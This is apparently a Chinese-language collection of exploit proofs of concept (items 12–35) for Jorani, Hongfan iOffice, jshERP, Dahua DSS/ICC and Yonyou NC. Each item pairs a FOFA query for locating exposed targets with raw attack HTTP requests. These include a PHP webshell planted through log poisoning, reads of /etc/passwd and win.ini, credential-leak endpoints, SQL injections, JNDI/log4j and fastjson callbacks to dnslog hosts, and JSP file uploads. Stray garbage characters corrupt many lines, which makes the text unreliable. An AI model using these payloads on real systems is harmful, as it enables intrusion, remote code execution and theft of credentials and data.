Host: 127.0.0.1, B0 ]/ I7 R2 x9 ?5 k3 |* F
Pragma: no-cache3 U7 i6 `! h1 M" E: O" X
Cache-Control: no-cache- B& P, A$ N; Y/ i1 ?5 `
Upgrade-Insecure-Requests: 1" e: t7 |8 o, g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
U [2 a! p+ x9 P' n; y( e) `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 e; [: k" j& r' _
Accept-Encoding: gzip, deflate" R4 f T R% z& W+ K+ s
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8% U+ S% h3 v& j3 @( r. g* Q
Connection: close4 o$ o7 ]9 X8 \$ A, n/ E
0 v1 n) o( P! t% L5 W2 a
- ^6 Z' G0 C9 O Q G: M12. Jorani < 1.0.2 远程命令执行8 M2 z9 z E5 a$ M' \6 P3 [4 o
FOFA:title="Jorani"
# d" v; e4 G9 h% J x: ?+ W第一步先拿到cookie
! Q/ t- } ?$ ]2 jGET /session/login HTTP/1.1
# C8 L9 b$ Q2 {Host: 192.168.190.30
% y P o# e; I/ B7 RUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
, | X& ^0 J( u. pConnection: close
& ]: z2 E, `5 {1 X7 l3 kAccept-Encoding: gzip
4 k1 p: H* R6 |# m0 g0 q3 |3 H, Q
6 }' B, ~8 K( U" n9 a9 c: j4 Z9 m P6 Z6 `
响应中csrf_cookie_jorani用于后续请求 r6 {, G5 r) d: `3 s; ?. F
HTTP/1.1 200 OK
; J K- w/ C# R" GConnection: close2 h% V0 L' W/ i# ?8 \
Cache-Control: no-store, no-cache, must-revalidate3 q2 ?* d4 Q; T' ]# l5 B0 D9 L
Content-Type: text/html; charset=UTF-8# y, S' L9 Q3 H8 [4 a
Date: Tue, 24 Oct 2023 09:34:28 GMT8 K7 G& c9 \! S" K2 k' n4 C
Expires: Thu, 19 Nov 1981 08:52:00 GMT
9 ]3 L5 U U+ P; l% L8 QLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
/ t% u5 f, Y5 X1 U- iPragma: no-cache8 y+ G! A( c `! A' j' e
Server: Apache/2.4.54 (Debian)' m, @* v8 y, K. u
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
" h4 D) \" g2 p7 x7 X O$ OSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
V: `* s- m* ?6 R& HVary: Accept-Encoding
1 c% O7 e2 h3 ?0 R/ d6 K4 W5 B) r' f" k9 D8 f6 M- B
+ f) p/ o$ p0 ], Z6 [/ t! f
POST请求,执行函数并进行base64编码
" }- q' I9 U+ ] |POST /session/login HTTP/1.1
5 Q2 h# w( [7 G- z) N* i+ gHost: 192.168.190.30
" v$ L# q* G' b# g- b( r; \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
- r. V: u# n: E5 V& uConnection: close
' ^" t; x" R) v3 ?0 i% NContent-Length: 252
% {) T8 r$ ^- S2 i [3 j JContent-Type: application/x-www-form-urlencoded
# C, Y. C# D6 Z$ O$ w UCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r2 b$ f' O9 u& Q
Accept-Encoding: gzip; ~( ]( u/ s: O @
! \6 P9 u# w+ r [6 Scsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor% S, g' o6 l$ C, x! E l0 R6 R6 m
/ l3 N$ w9 Y5 @% f$ \% P3 V' g/ S- ~: c2 R. y* P! o
7 G5 [( ^. J+ Y, J' n6 b向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串- C; i1 ]& `5 ?% M
GET /pages/view/log-2023-10-24 HTTP/1.1
, `: d( w. Z" GHost: 192.168.190.30
$ _* d# b6 L# h: TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36% @$ r! v4 J) r- g" d
Connection: close
+ U: n* v4 P7 Z. vCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r5 ^& d* u, C+ L0 J; }0 A$ e% n
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
% d( [6 i5 Q0 S6 v! U6 i n$ PX-REQUESTED-WITH: XMLHttpRequest
4 h; N- r! F: lAccept-Encoding: gzip
* J/ _* S, T/ W* \- ]- }, D5 X- j, x# F& W2 T" x* I
! H6 K3 V& Q9 z2 _0 o+ p5 ^4 y
13. 红帆iOffice ioFileDown任意文件读取
# L1 U) Y6 q1 q# P+ iFOFA:app="红帆-ioffice"# ^4 a1 p1 B3 r7 L2 _
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
/ L7 N* h$ Y) R+ A$ O- e0 ~6 cHost: x.x.x.x' w2 w8 }# [+ N8 J9 I- f0 z$ o% J: r
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36; Q5 S! y& i+ m9 b
Connection: close. N8 N4 a* c- p) i2 n, X
Accept: */*( L! n. l" {3 C( l6 {
Accept-Encoding: gzip
; H \! U* K( V$ M+ G
! Q* D. o" d+ ]/ i" a* n( F' A! f+ F8 M6 a' M
14. 华夏ERP(jshERP)敏感信息泄露3 Y$ M! d5 Z, O5 `
FOFA:body="jshERP-boot"8 X' a: g' B' n
泄露内容包括用户名密码/ K ?. ?2 r* c; v. [4 Z$ X( d4 m/ d
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
7 w, ~) b ]7 C7 ZHost: x.x.x.x( t' O+ \4 W, t3 o: K+ E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.368 u" P- B8 L; S+ M @
Connection: close/ |1 y9 i) Z/ P( N" N# p$ _
Accept: */*
8 q- s0 n7 R' G) Y) x+ m% o2 jAccept-Language: en. H& e% u, d' O1 t6 t* _+ g I3 I
Accept-Encoding: gzip
' Z n7 L0 H& l$ n8 p! e6 M' \) Z: \: Z$ {
* x3 w1 l' o$ t% H9 C15. 华夏ERP getAllList信息泄露
6 ~- _# T- t$ JCVE-2024-0490. ^, D/ {) z0 j
FOFA:body="jshERP-boot"
) J; z1 k1 [+ e. X( s; g泄露内容包括用户名密码
' N* ^ f, j* }* {GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1& ^3 M7 u6 o& Y7 x- V$ D
Host: 192.168.40.130:100* t L [, L' m; Y4 S, H& G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36) @; E- }! S& e
Connection: close
( l3 e6 M' {' w3 jAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8( Q$ H4 M; C( L9 s
Accept-Language: en
- b- e C) _& S% ^sec-ch-ua-platform: Windows5 A: x5 ~( B# I' G. r m& c* {
Accept-Encoding: gzip
* \1 j% s- W. b" {: K9 ?; z! Q+ `2 a& r6 {# ~1 ?! q
- V3 y9 H9 `9 E1 S! P16. 红帆HFOffice医微云SQL注入
! n; B+ \ j7 g/ Y! ^FOFA:title="HFOffice"
9 l5 ~* Q. k8 P# spoc中调用函数计算1234的md5值
) v5 u0 T, { D2 `6 D+ `1 AGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
2 @# j& V! m, t( IHost: x.x.x.x
9 A# R% a8 T5 T# x3 VUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
% V. J, _4 L/ E3 j- QConnection: close5 h/ X5 a) ~4 s- \
Accept: */*5 A9 s+ n* @, T
Accept-Language: en8 K! ~; y- u1 l6 \3 `4 N6 ~* W' ^4 v% y
Accept-Encoding: gzip
) C9 \+ |4 ~* Q7 U( ]% m1 f. A3 B
' a1 M; S. j/ o8 [5 |) ^- G, F L; x. _& Y
17. 大华 DSS itcBulletin SQL 注入
2 M, s& }- W; r$ P6 E$ oFOFA:app="dahua-DSS"! f$ P$ `, _" ], z/ ~
POST /portal/services/itcBulletin?wsdl HTTP/1.1
2 J# o) t" W! o/ v2 c: I: cHost: x.x.x.x
) ]' w# i! u/ d4 }' S& y8 hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 i! ?& ^+ k" ]0 {
Connection: close
' T: P( d* T( ?: A& o; l) g2 jContent-Length: 345$ i; { F$ r* |: A8 k2 P
Accept-Encoding: gzip n0 e" C# q/ ]; J& _( u
( A8 |& s2 e5 _<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>& `: S& ]9 z% V% F% S
<s11:Body>' _4 T# `& k" |7 c
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
. B/ U6 b1 S6 l <netMarkings>+ _- t( x* S4 m$ n" E! ~
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1* n. M; X: o% Y' e* `
</netMarkings>% R% N) ]6 U: M
</ns1:deleteBulletin>
0 F/ E# q6 }4 ]9 e4 C4 m </s11:Body>4 p7 d- W0 [* H2 y, | o. d) ]; v
</s11:Envelope>
0 Y) h7 \8 c4 H) \
, ~- S$ ^6 @9 M( l
8 i5 k- ?7 `% g, J18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
9 h/ |" b0 J, }. wFOFA:app="dahua-DSS"
9 L2 ] ?$ c% g$ `) hGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
1 N3 G8 |- l3 A8 wHost: your-ip
F; ~2 G! l7 }: J$ s. C D9 H; I7 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- S# u9 B2 g5 c9 b
Accept-Encoding: gzip, deflate0 {, u2 S8 W: N' I) v
Accept: */*
- k+ b( s' o: u" V* Q+ KConnection: keep-alive/ N D: E- _# ]2 T& D5 z) _% j
- l4 w8 Z* w+ L+ b) A! N" Y/ S2 D7 v0 r, C
5 E+ X% |; {7 [' [1 m19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入 y# }( _2 M5 k2 _- g9 i4 z
FOFA:app="dahua-DSS"0 B8 e, M9 Z5 V5 y9 N' n) r2 r
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1% h: ]1 I' d8 I+ w
Host:
& h( |: B$ j \7 x7 g7 ]User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36$ C0 u+ W- m7 p% W
Accept-Encoding: gzip, deflate% `7 Z1 p' c# y' |: K T
Accept: */*
7 y% A$ C2 k) ]$ m) S! EConnection: keep-alive1 ^! _& o7 {, ^) e
+ y4 N$ L P3 j8 p: W+ F+ u J
. P" ]/ }: t4 {+ C' P8 K20. 大华ICC智能物联综合管理平台任意文件读取
; g9 V' m. y [5 S4 rFOFA:body="*客户端会小于800*"
0 F; ^+ H6 {0 P# BGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.19 J! k1 b* f/ E. |: }5 p D+ P& k
Host: x.x.x.x# N2 }8 m2 V% j* F3 a
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
- b# ^+ S! r* s9 I1 Q' s; s+ EConnection: close d( g+ ?, T) i# \6 q
Accept: */*0 ?# Z$ x9 c( Q- q6 X
Accept-Language: en( {( j/ w, ]6 @. U* B; d, @' Y
Accept-Encoding: gzip
: B) |4 J+ R9 T! S( E/ w& f% G' i! |( x5 z1 A
: ~* P, E* H: }5 M8 N: q$ `( p
21. 大华ICC智能物联综合管理平台random远程代码执行
9 M8 R( E. u KFOFA:icon_hash="-1935899595": Q* w/ f, a m9 j' k
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
, c" ]" c8 n5 ?) U/ THost: x.x.x.x- S$ {+ P# N7 d6 L7 l; P' }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' r; }9 i* R `Content-Length: 1613 y# @ ]# F n% \7 y2 E- E
Accept-Encoding: gzip
8 c- L; g7 K9 A4 U6 k% G, YConnection: close
) f1 r4 h& a* s1 n! NContent-Type: application/json;charset=utf-80 j( ^; n( s% x* h
) w, ?8 T! t+ l4 F" H+ u{& X5 t5 t; m' n. P# z/ M! U
"a":{5 m4 k }- f" z S9 _1 r
"@type":"com.alibaba.fastjson.JSONObject"," X: [ A3 ~( \4 `0 U
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
, U6 I3 u# ]' C. Z7 w7 S3 J: T, Y }"" T2 {- ]9 P8 S( p' o$ h, G
}$ z7 T; D$ b( M- |
4 y0 o0 u7 d1 W# M
/ |/ z7 K- @/ p2 W- x22. 大华ICC智能物联综合管理平台 log4j远程代码执行! N3 |3 B& U# O/ u* _) h, e
FOFA:icon_hash="-1935899595". o( m) s/ U' m
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
. L2 E5 f6 \# o6 v% FHost: your-ip
7 j& | F( O7 C; ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
9 }; D& N2 I3 @( L6 ~7 _. ~Content-Type: application/json;charset=utf-8
9 Q0 G8 y4 Y' r& w2 k3 E% q2 d x8 {2 g! ]6 N+ D) p
{
- z; [2 X* L2 N" f"loginName":"${jndi:ldap://dnslog}"" Y/ u1 X& q/ r
}
7 x7 t6 a2 M* i" ~( f9 W, j) r% V2 p- _/ ~
7 e8 q1 m0 ?2 N0 {8 S
b5 q, t; C, n8 I: y
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行8 A* a/ A$ d) p7 F8 ^( N
FOFA:icon_hash="-1935899595"" \0 I; f8 I, H3 V
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.12 Y) M/ R: f0 b; G4 J6 }
Host: your-ip
8 ]/ a$ X P; a7 O+ C! m: g" q/ OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" b/ n/ h: N1 n
Content-Type: application/json;charset=utf-8* P' c' w5 X, V$ w1 O- J
Accept-Encoding: gzip
3 {* z3 d( Q! y! G. h8 C# AConnection: close/ h. I$ Z" o& F
5 W( d8 z! ?8 m6 Q( Y- P, d, U' F{# V) k5 I+ |* J
"a":{' O6 u. E; w- R/ C. s; Z
"@type":"com.alibaba.fastjson.JSONObject",6 K7 B: _6 e& D2 k' W( k5 U3 L
{"@type":"java.net.URL","val":"http://DNSLOG"}
, i0 C' p* Z, l4 D }""
$ {& @: |+ e! }, P5 Q6 L. W}
. P) Y+ a \0 _4 e/ k
- z! U$ m7 L: C" ~! ^( h8 Q3 ?4 {0 c% H9 v O! k, w
24. 用友NC 6.5 accept.jsp任意文件上传, i3 y; _% o% O/ \; O
FOFA:icon_hash="1085941792"+ |8 ?% D5 M3 h3 {- A
POST /aim/equipmap/accept.jsp HTTP/1.1
. } U9 t" ]; ~* h% l% f( w' B2 CHost: x.x.x.x% j9 s* S4 Q2 R. U( e! l5 j# S9 r% a
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.361 @) D7 P. i1 M0 o7 c2 m. k$ A
Connection: close& ^5 p* F$ G W) p5 [* R5 ]8 h
Content-Length: 449
! \5 k1 ^1 S8 n( i7 SAccept: */*+ ?* V3 w q2 J) l: b
Accept-Encoding: gzip
3 i3 W2 x' K+ G) J- ^: P3 KContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc5 f- N4 ^: D+ `0 [* x. S
- p) e1 A5 u. x
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
3 G+ a0 `9 t; u' c& W9 F: eContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
0 o: ]) Y$ I g( h. hContent-Type: text/plain
; K* R; m A9 _* Y9 K2 J1 B# h3 q6 f. C& @6 [' |
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
}5 Y3 g8 E s I: a6 [! S-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
' ]" k4 i5 H7 X, y& j) v! [+ lContent-Disposition: form-data; name="fname"
( K9 o* M# a/ D, |5 C. j, e
& |' U- d6 I; l$ s- b9 j% Y\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp1 P y( L; M' F4 t
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
8 O& A2 F5 \9 E; P6 V6 T" \- z* e5 V: s& r. L4 ~: N
1 V. T( z: C$ k6 X% B2 J& |8 O25. 用友NC registerServlet JNDI 远程代码执行
! g$ I7 z2 i1 x* GFOFA:app="用友-UFIDA-NC"
' p0 T x/ Q2 K- v1 q; sPOST /portal/registerServlet HTTP/1.1
- ~# N6 F' I/ \' L3 P9 D- rHost: your-ip; c7 ]# t) ^* x" w+ z+ N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
7 K1 c2 o% k$ O0 A4 Y5 A7 sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
- L6 v# x* c9 f s; vAccept-Encoding: gzip, deflate" _' O- y) h1 ]1 a& ~& b; `5 O% g
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
( ?4 t" ?* c+ s# c X. N3 D& XContent-Type: application/x-www-form-urlencoded
0 H" B- U( A0 m6 y1 d3 c$ u/ N. A1 \
. P) [9 K/ X6 h6 E/ Rtype=1&dsname=ldap://dnslog3 t) k% b1 D9 ?' ^9 W
- P- C! f N, {+ e/ M! @: a
4 r: A/ ~% ^& X9 O
4 n! ^, U- q; L5 ^26. 用友NC linkVoucher SQL注入' ` d' C3 F9 x( a
FOFA:app="用友-UFIDA-NC"
( g* f2 p( B5 P- K: }4 ZGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.17 c' x+ Y6 H& g# q6 c; u* \1 @
Host: your-ip# F$ L, ^9 y4 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 h7 g* T. g( L* o* ?& K, OContent-Type: application/x-www-form-urlencoded
# o5 w6 y6 }1 o% U* C: s0 E& FAccept-Encoding: gzip, deflate, j! a+ y- g# [( p/ c% `. l
Accept: */*) w6 A/ i% ~) E
Connection: keep-alive9 j% z& @7 e* K7 g7 C% s! |' ]( Y
" @. m; W% g6 ]8 G4 J- {6 b! z/ I0 u$ ^
27. 用友 NC showcontent SQL注入
' Q ~) f4 v7 D/ |+ Q5 wFOFA:icon_hash="1085941792") w9 ?# G' m# @% f2 n
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.13 n0 O |( q8 k/ o' o. i
Host: your-ip, m8 z- f1 `! R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 n Q; X0 i+ A2 j2 i1 wAccept-Encoding: identity- v# f: v" \7 c& J( u
Connection: close
2 T/ y G3 U7 C0 [$ V9 RContent-Type: text/xml; charset=utf-8
7 n( c, p' N1 V$ ?* ^
# e. \1 q- A0 M) t0 ?4 o$ J6 L2 G: K" B4 ]! f2 t6 s& p. P
28. 用友NC grouptemplet 任意文件上传
6 A: j3 N2 x5 ^# x: ^7 @. uFOFA:icon_hash="1085941792"0 _, }3 {; c8 K! I4 Q6 x) e% _
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
4 o: {5 s5 i& L" l9 A7 G% k& l% ]/ FHost: x.x.x.x
- x5 k1 M$ _7 Z4 Q' t- Y7 r# X$ c6 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.362 @' ~1 x5 w4 F8 O9 H9 ]3 I, _. I! K
Connection: close# p5 j& X2 m0 k H5 |
Content-Length: 2689 n* ` d [/ J6 F, d
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
9 j) G0 O8 B" v1 k0 u2 gAccept-Encoding: gzip
; f5 H+ b, v, A
7 E/ j% ~4 R/ O0 s2 \( r: R( v------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
( a5 r J Q2 n1 eContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"8 p9 F5 U& o, _2 T- O k) a
Content-Type: application/octet-stream! {" O! H. z2 O9 a* _+ ]$ b6 |1 Z: v
& P8 p5 v& U/ e/ p0 l6 n4 t& F
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>, T# |& T6 w: O. n6 c0 H1 i' v
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
+ I; b2 q* a8 n9 s9 U2 u" |6 a( h. O- F5 t) M5 ^. m+ e2 N
Q3 N7 C! J+ V) Y0 E/uapim/static/pages/nc/head.jsp: Z/ Q. j# u$ ^$ e8 i
" k% f1 c! D) ~8 q9 Y1 w
29. 用友NC down/bill SQL注入
$ M; |1 M! R, P7 P5 s% C# fFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
, w1 P$ ~) V) j" K, ^! ZGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.15 _# d7 L2 ]$ F* u0 x& t" R+ L
Host: your-ip
* j! C" ^/ {4 m8 }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; @! S, J8 `/ a' W
Content-Type: application/x-www-form-urlencoded! a4 w/ a2 F' e# h0 m0 ~5 u
Accept-Encoding: gzip, deflate; ~1 p% f* `4 S+ Q) {8 J/ L
Accept: */*
+ f$ q. S+ M0 |( U6 oConnection: keep-alive% E, H& i4 S" ^" c* N
; [" p6 h, k! u( |& |- p9 }9 w" z1 ~" m. n# W* L+ \& g! M
30. 用友NC importPml SQL注入' }: O% p. m: I9 ~
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
( E& F" n+ u+ j3 ^; A$ hPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
; r9 S( Q+ K/ f3 a4 O! [Host: your-ip
l) [; l4 V" h3 lContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V; o/ }3 | I' |0 \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
4 S" Q% P1 z5 l. lConnection: close
- [) i- s( A! {+ m+ P9 e8 i& w# T5 ?" z6 _/ J4 C& G
------WebKitFormBoundaryH970hbttBhoCyj9V
% ?1 z' y1 c1 L0 T! n$ mContent-Disposition: form-data; name="Filedata"; filename="1.jpg"
2 c6 u7 Q' `; |, NContent-Type: image/jpeg
8 p; P* B: m9 A* _ P------WebKitFormBoundaryH970hbttBhoCyj9V--
2 ?; x0 Y) {% q: I& q. P+ s4 U! _0 z
6 J( O! f7 w2 C& K' U) c31. 用友NC runStateServlet SQL注入2 x7 j: L- ~) i# M
version<=6.51 B' j9 Q* U+ M) U: N/ H, l7 S
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"' U+ Z, C5 Q6 L0 o
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.19 E7 V# {$ X: q& b
Host: host2 d( r3 p% ?, O$ ?3 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36. J1 G6 |/ B R$ Y" D# Q K/ O
Content-Type: application/x-www-form-urlencoded( W! s# b& ?) u3 M4 Z: r
! O: S- n$ N( P z
8 F$ ~# o* s, @# ]32. 用友NC complainbilldetail SQL注入, t* v& |5 }$ \ J" m1 f0 q9 S
version= NC633、NC65+ V# G8 L6 X) w9 _; _# M
FOFA:app="用友-UFIDA-NC"" r1 e. C) U+ `3 V1 j3 s5 y d6 M
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.19 e0 P+ i0 `& Z) ?
Host: your-ip
{- W9 K2 w2 S5 P9 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 l* B9 A0 f' \+ A, b- t% T
Content-Type: application/x-www-form-urlencoded
) {7 g i; ^1 {# ^5 \+ C; t3 |Accept-Encoding: gzip, deflate
" O4 u# D1 D/ K& V6 c/ E0 W: x0 RAccept: */*
0 c( M- n- f9 I* p& XConnection: keep-alive3 u8 [* @/ s' Q" |* W
2 y j0 g" P1 ^" J0 i4 r
0 B- ~% h) E, A$ s3 |* D$ n% q7 J33. 用友NC downTax/download SQL注入9 u+ L/ B4 R" @0 i% b% Z- K Q6 X: ^
version:NC6.5FOFA:app="用友-UFIDA-NC"
6 d( E* }; b. I7 @; f* X: `GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1% Q. O' l) w: M
Host: your-ip
8 ~/ k3 P0 Q# I% SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& i% V# ~6 {9 l! f# b) V( uContent-Type: application/x-www-form-urlencoded/ A" o% G/ i& A7 g, ?
Accept-Encoding: gzip, deflate- n/ g' h2 c) F: F
Accept: */*% V- n& t! e! |- p0 s
Connection: keep-alive
8 J6 I& o3 `: D6 F* }" e$ r' O) S% q& j: e# k3 z9 W
5 f0 l; q/ s) V
34. 用友NC warningDetailInfo接口SQL注入
0 Y9 J; l- K/ U" Q. t" }FOFA:app="用友-UFIDA-NC") t( {* k/ Q( K
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
5 ^% I5 a ~( x- u6 lHost: your-ip
$ q2 k" [1 [2 t$ s% g- pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' F1 h0 Q- ], P( W" g' y
Content-Type: application/x-www-form-urlencoded
* T/ k: [4 S. P: b% [0 ^Accept-Encoding: gzip, deflate
2 b' R0 p8 N1 v$ dAccept: */*
+ ~5 U8 e7 i4 V& q8 Q4 y- b5 q8 r: HConnection: keep-alive
$ E1 U$ d, O; [& W5 s1 n |1 H3 W3 [$ H
. Z l$ v/ ^. e- \, S+ u& f. H% _35. 用友NC-Cloud importhttpscer任意文件上传: d& h; A. ^5 g5 X4 V- ?9 w9 t
FOFA:app="用友-NC-Cloud"
( M8 ~1 {' ?- H E$ z1 RPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.14 n# M9 }0 q' p, ~$ x
Host: 203.25.218.166:8888. G2 L9 V/ \4 p3 D0 j* S" S, q
